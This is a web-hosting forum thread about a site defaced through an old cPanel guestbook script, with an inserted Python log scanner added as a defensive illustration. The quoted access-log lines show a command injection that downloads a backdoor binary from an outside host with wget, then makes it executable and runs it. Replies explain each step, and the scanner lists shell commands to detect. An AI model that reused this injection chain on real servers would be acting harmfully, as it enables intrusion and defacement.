How did they hack it?

  • truth
    Junior Member
    • Mar 2004
    • 25

    #1

    How did they hack it?

    Today one of my customers' web sites was hacked. As far as I can see, the code below was used:

    GET /guestbook/templates/error.php
    GET /guestbook/templates/error.php?cmd=uname%20-a
    GET /guestbook/templates/error.php?cmd=cd%20/tmp;wget%20http://tecnobyte.org/r0nin;chmod%20777%20r0nin;./r0nin
    GET /guestbook/admin.php?action=template&session=244d9aa960b50bbd60d399b9e7fb79ff&uid=1
    GET /guestbook/admin.php?action=template&tpl_name=error.php&session=244d9aa960b50bbd60d399b9e7fb79ff&uid=1

    I also tried all those lines and the only thing I could see was all the folders and files (even the passwd ones, but I think they are encrypted). But how they could find the FTP password to change the index.htm file, I don't understand. Any ideas?

    What is the way to prevent this from happening again? Asking our customers not to use the guestbook?

    Thank you.
    Regards
  • Jonathan
    Senior Member
    • Mar 2004
    • 1229

    #2
    Which guestbook script was it?
    Kinda scary they can pull off random lines
    after a valid URL to retreat upwards to the passwd folder.
    "How can someone be so distracted yet so focused?"
    - C


    • AndrewT
      Administrator
      • Mar 2004
      • 3655

      #3
      The Guestbook script provided in cPanel is very insecure if you did not have it upgraded to the newer version.


      • Jonathan
        Senior Member
        • Mar 2004
        • 1229

        #4
        Try searching SF.net for a good Guestbook...
        http://sourceforge.net/search/?words=Guestbook
        "How can someone be so distracted yet so focused?"
        - C


        • truth
          Junior Member
          • Mar 2004
          • 25

          #5
          Thank you for your replies and I am sorry for my delayed reply.

          As Andrew pointed out, my customer used the old version of the Guestbook we have in cPanel. I have deleted all the files, but I am not sure if they could have changed any other file or created some admin accounts as well.

          I understand it was not very difficult because, as far as I could see from the log file, it took only a few minutes to change the index file. But my question is how could they do that? Because I could not get anything with those lines...


          • Jonathan
            Senior Member
            • Mar 2004
            • 1229

            #6
            Possibly some form of tool to "spoof" a header maybe?
            Something to confuse the script into letting them in.

            I know there's an extension for Firefox that can spoof headers,
            but that's more to help the user enter porno sites.
            "How can someone be so distracted yet so focused?"
            - C


            • truth
              Junior Member
              • Mar 2004
              • 25

              #7
              I am not very familiar with spoofing the header, but it seems it is not very difficult. I will do a search on it...

              Thank you all for your replies.

              Regards


              • Amitabh
                Member
                • Mar 2004
                • 78

                #8
                Originally posted by truth
                1. GET /guestbook/templates/error.php
                2. GET /guestbook/templates/error.php?cmd=uname%20-a
                3. GET /guestbook/templates/error.php?cmd=cd%20/tmp;wget%20http://tecnobyte.org/r0nin;chmod%20777%20r0nin;./r0nin
                4. GET /guestbook/admin.php?action=template&session=244d9aa960b50bbd60d399b9e7fb79ff&uid=1
                5. GET /guestbook/admin.php?action=template&tpl_name=error.php&session=244d9aa960b50bbd60d399b9e7fb79ff&uid=1
                I haven't seen the script, but I assume that its error pages have a facility to execute system calls through the query string without any cross-checks.

                This is how they have gone about it. On line 2, it runs a system command called uname with all the info (for more info on uname, see http://www.ss64.com/bash/uname.html).

                On line 3, they change to the "tmp" directory first so that they can have write and owner rights (cd%20/tmp -> cd /tmp; the semicolon is the command delimiter). Then they download a file named "r0nin" from a server called "tecnobyte.org" through the wget utility (wget%20http://tecnobyte.org/r0nin -> wget http://tecnobyte.org/r0nin). Now they change the file mode so that it can run as an executable (chmod%20777%20r0nin -> chmod 777 r0nin). Lastly they run this file: ./r0nin. This downloaded file must have contained the code for replacing the index file on your client's site.

                Hope this helps you in understanding the way the site page was replaced.

                Amitabh
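As an added illustration (not code from the thread or from the guestbook script), here is a small Python scanner that applies Amitabh's reading of the log lines: it percent-decodes each query parameter and flags shell delimiters or command names, and also flags the admin template action being pointed at a .php file. The request lines are the ones quoted above; the benign request and the function names are constructed for this example.

```python
"""Scan web-server request lines for the guestbook command-injection chain
discussed in this thread. Added example, not code from the thread or the
guestbook script; SAMPLE_REQUESTS are the lines quoted above plus one
constructed benign request."""
import re
from urllib.parse import unquote

# Shell delimiters and substitution syntax: never legitimate in a guestbook parameter.
SHELL_META = re.compile(r"[;|&`]|\$\(")
# Command names that appear in the thread's log lines, matched as whole tokens.
SHELL_CMDS = re.compile(r"(^|[\s;|&])(uname|cd|wget|curl|chmod|sh|bash|perl)(\s|$)")

SAMPLE_REQUESTS = [
    "GET /guestbook/templates/error.php",
    "GET /guestbook/templates/error.php?cmd=uname%20-a",
    "GET /guestbook/templates/error.php?cmd=cd%20/tmp;wget%20http://tecnobyte.org/r0nin;chmod%20777%20r0nin;./r0nin",
    "GET /guestbook/admin.php?action=template&session=244d9aa960b50bbd60d399b9e7fb79ff&uid=1",
    "GET /guestbook/admin.php?action=template&tpl_name=error.php&session=244d9aa960b50bbd60d399b9e7fb79ff&uid=1",
    "GET /guestbook/index.php?page=2&sort=date",  # constructed benign request
]

def parse_query(query):
    """Split on '&' only (never on ';', which the attacker uses as a shell
    delimiter) and percent-decode each name and value."""
    params = []
    for pair in query.split("&"):
        if pair:
            name, _, value = pair.partition("=")
            params.append((unquote(name), unquote(value)))
    return params

def analyze_request(line):
    """Return a list of findings for one 'METHOD <uri>' line; empty if clean."""
    findings = []
    fields = line.split()
    if len(fields) < 2:
        return findings
    _, _, query = fields[1].partition("?")
    for name, value in parse_query(query):
        if SHELL_META.search(value) or SHELL_CMDS.search(value):
            findings.append(f"shell syntax in parameter {name!r}: {value!r}")
        # The admin template editor aimed at a .php file is how the backdoor page was planted.
        if name == "tpl_name" and value.lower().endswith(".php"):
            findings.append(f"template action writes PHP file {value!r}")
    return findings

def scan_log(lines):
    """Map each suspicious request line to its findings; clean lines are dropped."""
    return {line: hits for line in lines if (hits := analyze_request(line))}

if __name__ == "__main__":
    for line, hits in scan_log(SAMPLE_REQUESTS).items():
        print(line, *hits, sep="\n    ")
```

Run against a real access log, feed it the request field of each line; lines 2, 3 and 5 of the thread's list are the ones that come back flagged.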


                • Jonathan
                  Senior Member
                  • Mar 2004
                  • 1229

                  #9
                  Wow. Any idea on how to test that to see
                  if it can get through any of my own sites?
                  "How can someone be so distracted yet so focused?"
                  - C


                  • truth
                    Junior Member
                    • Mar 2004
                    • 25

                    #10
                    Thank you very much for your reply Amitabh.

                    It is now clear how they did that (also scary), but as Andrew mentioned it was a very old PHP Guestbook. I am sure the new versions are secure enough that they cannot hack it that easy.

                    Regards.


                    • djn
                      Senior Member
                      • Mar 2004
                      • 140

                      #11
                      At first sight (the r0nin thing is still there to download) it seems to be a Linux executable called PsychoPhobia Backdoor (you find this string if you open it in Notepad), and lines 4 and 5 seem to me like the result of a hijacked session (session files are often placed in /tmp).
                      I'd say that the guestbook script not only runs system commands, but also doesn't check the query inputs or the session ID at all.
                      If somebody runs this guestbook, he had better disable it now...

                      djn


                      • Tycho
                        Junior Member
                        • Mar 2004
                        • 14

                        #12
                        Originally posted by AndrewT
                        The Guestbook script provided in cPanel is very insecure if you did not have it upgraded to the newer version.
                        This is not about phpBook, is it?


                        • truth
                          Junior Member
                          • Mar 2004
                          • 25

                          #13
                          No, it is the old Guestbook that comes with the CGI Scripts in cPanel...


                          • Amitabh
                            Member
                            • Mar 2004
                            • 78

                            #14
                            Originally posted by Jonathan
                            Wow. Any idea on how to test that to see
                            if it can get through any of my own sites?
                            This is a simple case of the query string not being correctly checked for the parameters passed. Make sure that the third-party scripts that you use do not process system calls through the query string and forms. And in case they do, make sure they have relevant checks in place to properly filter those.

                            Sadly, there is no single way of determining if the code in question is vulnerable to this type of script problem.

                            Regards
                            Amitabh
